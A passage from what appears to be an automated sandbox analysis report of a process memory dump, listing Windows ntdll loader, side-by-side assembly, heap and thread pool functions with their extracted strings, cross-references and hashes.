                                                        • Instruction Fuzzy Hash: E8817C71A40368AFDF20CF99C845BEEBBB5FB49718F50415AE504BB390D375A981CB50
                                                        Function 013E29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01422624
                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01422412
                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014224C0
                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014222E4
                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014225EB
                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01422602
                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 0142261F
                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01422498
                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01422506
                                                        • @, xrefs: 0142259B
                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01422409
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                        • API String ID: 0-4009184096
                                                        • Opcode ID: 7d23bec877956fb481706d7d1c1441178fc45f7fafaff2d96181b137b659e37b
                                                        • Instruction ID: 27b665e1d9b9f34ae1d4941c2d268c0cadf7d4981a850cdfcd7d3074ba87b307
                                                        • Opcode Fuzzy Hash: 7d23bec877956fb481706d7d1c1441178fc45f7fafaff2d96181b137b659e37b
                                                        • Instruction Fuzzy Hash: 54026FF1D002399BDF31DB58CC84B9AB7B8AB54708F4041EAE609A7291DB709ED4CF59
                                                        Function 01458B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                        • API String ID: 0-2515994595
                                                        • Opcode ID: baec316fa29c75c119aa5b52d44b720ab75ff7bb7a77389209d99c96e2e7ec74
                                                        • Instruction ID: 1511261d553be5c17755419a094c5ffe46701feae635e56c8f667f15dcef4c8a
                                                        • Opcode Fuzzy Hash: baec316fa29c75c119aa5b52d44b720ab75ff7bb7a77389209d99c96e2e7ec74
                                                        • Instruction Fuzzy Hash: CF51F2711143069BD326DF1E8844BABBBE8FF94244F14091EFE59C3262EB70D609C792
                                                        Function 013CAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                        • API String ID: 0-3197712848
                                                        • Opcode ID: 5637933f270f990d8c594581062d7c7df1d8908a79966922db887b7110128f74
                                                        • Instruction ID: 1ecab41bb530078674af6e2305b256365a5f523c9d5792b4606770266963e28c
                                                        • Opcode Fuzzy Hash: 5637933f270f990d8c594581062d7c7df1d8908a79966922db887b7110128f74
                                                        • Instruction Fuzzy Hash: 9012157160835A8BD321DF28C841BABBBE4BF84B58F45051EF9899B395E730DD44CB92
                                                        Function 01460274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                        • API String ID: 0-1700792311
                                                        • Opcode ID: 57093da51908d81df11aaeaa0210e04ba23896f2377dd0e531e55acd8252b015
                                                        • Instruction ID: b9d25775df8f3bec36b9a7d97ee2736350246d0534ea61ce727dd6b9cf81ecd5
                                                        • Opcode Fuzzy Hash: 57093da51908d81df11aaeaa0210e04ba23896f2377dd0e531e55acd8252b015
                                                        • Instruction Fuzzy Hash: 3DD1DD35600686DFDB22DF68C440AAEBFF5FF5A718F48805AF4499B362C7749981CB12
                                                        Function 014389B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01438A3D
                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01438A67
                                                        • VerifierDebug, xrefs: 01438CA5
                                                        • VerifierDlls, xrefs: 01438CBD
                                                        • AVRF: -*- final list of providers -*- , xrefs: 01438B8F
                                                        • HandleTraces, xrefs: 01438C8F
                                                        • VerifierFlags, xrefs: 01438C50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                        • API String ID: 0-3223716464
                                                        • Opcode ID: 06b0713ea4558d43f9779e339d29cb0dabc910cd7c035f13089db47fcdde97b7
                                                        • Instruction ID: 4ef9c033e6d10553ca3c7ed88ab886bd46799950fd81e3ed85a0d13d753d1bed
                                                        • Opcode Fuzzy Hash: 06b0713ea4558d43f9779e339d29cb0dabc910cd7c035f13089db47fcdde97b7
                                                        • Instruction Fuzzy Hash: 0A9116B26413039FD721EF6CD980B5BBBA4ABD8718F46061AFA406F371C7709C068B91
                                                        Function 013BEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                        • API String ID: 0-1109411897
                                                        • Opcode ID: 92ff44d675065fabf1f874f909b17e0c5bff094cbdb8fc85e6aa2678acfdc6de
                                                        • Instruction ID: 5efa37172bf1abe091cb4e5d7861c21a6d8adf9ad7af6365781cd86d09062746
                                                        • Opcode Fuzzy Hash: 92ff44d675065fabf1f874f909b17e0c5bff094cbdb8fc85e6aa2678acfdc6de
                                                        • Instruction Fuzzy Hash: 8EA24F74A0562A8FDB64DF19CC887E9BBB5AF45308F1442EAD50DA7764EB349E81CF00
                                                        Function 013E63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-792281065
                                                        • Opcode ID: 70adba60383f69168338aa6bf0f6c4fe64e78b19432e356e512c424e8f44889b
                                                        • Instruction ID: 1a96a10b67b10378efb5adae298eaf91ef77a47454da24aa39fbc36052c7b2c3
                                                        • Opcode Fuzzy Hash: 70adba60383f69168338aa6bf0f6c4fe64e78b19432e356e512c424e8f44889b
                                                        • Instruction Fuzzy Hash: C8915AB0B00335DBDB25DF19D849BAA7FA5EB61B18F99402EE5007B7E1D7709841CB90
                                                        Function 013A645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01409A11, 01409A3A
                                                        • LdrpInitShimEngine, xrefs: 014099F4, 01409A07, 01409A30
                                                        • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01409A2A
                                                        • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 014099ED
                                                        • Getting the shim user exports failed with status 0x%08lx, xrefs: 01409A01
                                                        • apphelp.dll, xrefs: 013A6496
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-204845295
                                                        • Opcode ID: 23cd3a5b0006b4346a909401581be231108ff5601372824642448114884f899b
                                                        • Instruction ID: f3ce95a1a796978c52713f7b0ff641355b57eb6908cfc97eee77ea658be9b1cc
                                                        • Opcode Fuzzy Hash: 23cd3a5b0006b4346a909401581be231108ff5601372824642448114884f899b
                                                        • Instruction Fuzzy Hash: FE51E7712083459FE721DF29D841B6B7BE8FB84B4CF44452EF5899B2B1DA30E944CB92
                                                        Function 013E2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0142219F
                                                        • SXS: %s() passed the empty activation context, xrefs: 01422165
                                                        • RtlGetAssemblyStorageRoot, xrefs: 01422160, 0142219A, 014221BA
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01422178
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 014221BF
                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01422180
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                        • API String ID: 0-861424205
                                                        • Opcode ID: 28e6ad5365b485420920da9574c694a707e6e1dc3e035628bce248c9be5f0bdf
                                                        • Instruction ID: 5523fcaa874cd9d55230a0417abaf794f573fa0cd0227e9bd89247498ac59d93
                                                        • Opcode Fuzzy Hash: 28e6ad5365b485420920da9574c694a707e6e1dc3e035628bce248c9be5f0bdf
                                                        • Instruction Fuzzy Hash: 0B313936F4033577FB218A9A8C45F6B7BACDF64A58F05005AFA04BB291D2B09E41C6A1
                                                        Function 013EC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01428181, 014281F5
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 013EC6C3
                                                        • Loading import redirection DLL: '%wZ', xrefs: 01428170
                                                        • LdrpInitializeProcess, xrefs: 013EC6C4
                                                        • LdrpInitializeImportRedirection, xrefs: 01428177, 014281EB
                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 014281E5
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-475462383
                                                        • Opcode ID: 4878e206c9a6863a90d6935ab4be170edd5bd13deb757a7148aea209bceaccc9
                                                        • Instruction ID: bc66af30df15fe2683c011b7f095ae17b9ccc6208e0521724b004746008db3e0
                                                        • Opcode Fuzzy Hash: 4878e206c9a6863a90d6935ab4be170edd5bd13deb757a7148aea209bceaccc9
                                                        • Instruction Fuzzy Hash: B531E4B26443569BD220EF2DD946E2BBBD4EF94B18F45051CF9446B3A1E620EC04CBA2
                                                        Function 013F096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 013F2DF0: LdrInitializeThunk.NTDLL ref: 013F2DFA
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0BA3
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0BB6
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0D60
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 013F0D74
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                        • String ID:
                                                        • API String ID: 1404860816-0
                                                        • Opcode ID: a0992bfbfb359efcf60fb34bad46d12f648b71532db5037840d4f369c02f02b0
                                                        • Instruction ID: 95064021abcbbb89d8f8d15a8c51d978bd46a1facedf6e485f249edd66e077aa
                                                        • Opcode Fuzzy Hash: a0992bfbfb359efcf60fb34bad46d12f648b71532db5037840d4f369c02f02b0
                                                        • Instruction Fuzzy Hash: 90424B71900715DFDB25CF28C880BAAB7F5BF04318F1445AEEA99AB352D770A984CF60
                                                        Function 013EC720 Relevance: 6.4, Strings: 5, Instructions: 141COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c$x,$x,
                                                        • API String ID: 0-3704995447
                                                        • Opcode ID: eb5c52c2c1b348e672af31d733c101975e7702d7d3d81d591edaef5fad665feb
                                                        • Instruction ID: c23c12ac1880e69b163a08ae845971daf04fec23510a3b9bdf722f28b719c318
                                                        • Opcode Fuzzy Hash: eb5c52c2c1b348e672af31d733c101975e7702d7d3d81d591edaef5fad665feb
                                                        • Instruction Fuzzy Hash: 6F41E472540325AFD721EB6CD844B5F7BE8EF54B58F46892AF948D72A0EB70D800CB91
                                                        Function 013BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                        • API String ID: 0-379654539
                                                        • Opcode ID: b936a69a956a5b809b72d2fcefa2840e337b5b561dc28410621688620a92d8d6
                                                        • Instruction ID: 786604cfd91ef9c855d166213a8a5669a2d7753fcbfdd1baf2431fbf1c35e263
                                                        • Opcode Fuzzy Hash: b936a69a956a5b809b72d2fcefa2840e337b5b561dc28410621688620a92d8d6
                                                        • Instruction Fuzzy Hash: 7AC16A7410878ACFD711CF58C080BAAB7E4BB84708F04496AFA95DBB51F778CA49CB56
                                                        Function 013E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 013E8421
                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 013E855E
                                                        • @, xrefs: 013E8591
                                                        • LdrpInitializeProcess, xrefs: 013E8422
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-1918872054
                                                        • Opcode ID: 60a4c51c5d86a5d9ba55e73044b4df72b05823da0d8a7976efe0585455cd5f0a
                                                        • Instruction ID: fc50f15fddd6381689740081e8451f6f036be5922e6e8d3ca65fa3d17cf65974
                                                        • Opcode Fuzzy Hash: 60a4c51c5d86a5d9ba55e73044b4df72b05823da0d8a7976efe0585455cd5f0a
                                                        • Instruction Fuzzy Hash: 63919A71908355EFD721EF69CC44EABBAECFF84748F40096EFA8496190E734D9448B62
                                                        Function 013E273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 014222B6
                                                        • .Local, xrefs: 013E28D8
                                                        • SXS: %s() passed the empty activation context, xrefs: 014221DE
                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 014221D9, 014222B1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                        • API String ID: 0-1239276146
                                                        • Opcode ID: df3f59899ccb3a98e7431aa002796383d482b48631fd557c83908f11199da31f
                                                        • Instruction ID: e1a0b6cd52d46b42af37f3dee4988a6be70eb31baf76a05147e1c3bfc334bb58
                                                        • Opcode Fuzzy Hash: df3f59899ccb3a98e7431aa002796383d482b48631fd557c83908f11199da31f
                                                        • Instruction Fuzzy Hash: 25A183319003399BDB25CF58D888B9AB7B5BF59358F1541EAE908A7391D7709EC0CF90
                                                        Function 013E4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01423437
                                                        • RtlDeactivateActivationContext, xrefs: 01423425, 01423432, 01423451
                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01423456
                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0142342A
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                        • API String ID: 0-1245972979
                                                        • Opcode ID: e9a23c7cf38289da24b5828a1f3a66991b8e2b30f7fadede8e4d53683da1bc63
                                                        • Instruction ID: 8ec844b213c402d6f55c366715105a7f6bbad33d8c810a2cf7499112c29e9413
                                                        • Opcode Fuzzy Hash: e9a23c7cf38289da24b5828a1f3a66991b8e2b30f7fadede8e4d53683da1bc63
                                                        • Instruction Fuzzy Hash: 756147326007229BDB22CF1DC845B2AB7E5BF88B18F54816EE955DB390D734E841CB91
                                                        Function 013B64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01410FE5
                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 014110AE
                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0141106B
                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01411028
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                        • API String ID: 0-1468400865
                                                        • Opcode ID: 342be0647ee32254714f0a626f5b4ef8808e808631ea3cf529848c6968c6c717
                                                        • Instruction ID: b6854c4a416066802ad0b25e7b817aa1289030598e58b64493807b97f814f4b2
                                                        • Opcode Fuzzy Hash: 342be0647ee32254714f0a626f5b4ef8808e808631ea3cf529848c6968c6c717
                                                        • Instruction Fuzzy Hash: 5E71CFB1904305DFCB21DF19C8C5B977FA8AF94758F40046AFA488B697E335D588CB92
                                                        Function 013E4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0142362F
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01423640, 0142366C
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 0142365C
                                                        • LdrpFindDllActivationContext, xrefs: 01423636, 01423662
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 0-3779518884
                                                        • Opcode ID: 83d1850bb39e136143e39d972bc412a8f779e0a1ad8bc68513594669b4a7bb9b
                                                        • Instruction ID: 262d3a634e2cbc6245b7d0e49287569a6a14162499966488d552cf9627a1719b
                                                        • Opcode Fuzzy Hash: 83d1850bb39e136143e39d972bc412a8f779e0a1ad8bc68513594669b4a7bb9b
                                                        • Instruction Fuzzy Hash: 5F310B219003319ADF329A0CC84DB77BAF4BB4965CF46412AE604D76E3D7A6DC8087D5
                                                        Function 013D245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0141A992
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0141A9A2
                                                        • LdrpDynamicShimModule, xrefs: 0141A998
                                                        • apphelp.dll, xrefs: 013D2462
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-176724104
                                                        • Opcode ID: 5758deb5ef73c48e3c2e12a69cbc62979b0d78bbc7061bee813fb63d6aedfee4
                                                        • Instruction ID: f31e2a0ef6dd542db875b145ab37a9786803d8409e4e824e4c1efa6a6e8c1bb4
                                                        • Opcode Fuzzy Hash: 5758deb5ef73c48e3c2e12a69cbc62979b0d78bbc7061bee813fb63d6aedfee4
                                                        • Instruction Fuzzy Hash: DF315B76601241ABDB319F5DD881E6BBFB9FB84B04F67401EE9016B379D7705881CB80
                                                        Function 013C29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 013C3255
                                                        • HEAP: , xrefs: 013C3264
                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013C327D
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                        • API String ID: 0-617086771
                                                        • Opcode ID: a97a6c0826c7ffa29b4f9e4306a10c86ca385878313a96e1d1e4024e558109b5
                                                        • Instruction ID: 76ed8596c1c6a6249a69e2b9db95741bc66af172ca1487e14d3896f5845acf40
                                                        • Opcode Fuzzy Hash: a97a6c0826c7ffa29b4f9e4306a10c86ca385878313a96e1d1e4024e558109b5
                                                        • Instruction Fuzzy Hash: 8E92B971A042499FEB25CF68C4407AEBBF1FF48B18F18806DE84AAB691D735AD45CF50
                                                        Function 013C0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
